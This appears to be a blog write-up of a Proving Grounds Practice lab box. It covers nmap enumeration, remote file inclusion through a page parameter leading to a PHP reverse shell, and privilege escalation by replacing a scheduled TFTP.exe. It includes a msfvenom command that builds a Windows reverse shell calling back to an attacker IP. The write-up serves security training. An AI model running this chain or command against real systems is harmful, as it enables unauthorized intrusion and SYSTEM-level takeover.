Enumeration

Nmap

Initial nmap scan revealed FTP, SMB and HTTP 8080 ports were open.

Image

Web Enumeration

At first I visited the website but it only showed default xampp page. Then I applied directory brute forcing and found /site endpoint.

Image

Visiting the website I found ?page parameter which seemed suspicious.

Image

Exploitation

Remote File Inclusion (RFI)

Later, I tried RFI and it worked.

Image

It worked because allow_url_include parameter was enabled.

Image

I then downloaded ivan-sincek/php-reverse-shell and changed it to txt file (RFI to RCE) and updated IP value.

Image

And I got user shell.

Image

I then simply read the user flag.

Image

Privilege Escalation

Scheduled Tasks

There was a Backup folder and inside it there were three different files. info.txt stated that TFTP.exe is executed every 5 minutes.

Image

So I created a reverse shell using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.210 LPORT=4444 -f exe -o exp.exe

Image

Then I transfered the file as TFTP.exe and setup a netcat listener and waited for 5 minutes.

Image

I simply obtained SYSTEM shell.

Image


<
Previous Post
Ochima - Proving Grounds Practice
>
Next Post
CVE-2023-6019 - Proving Grounds Practice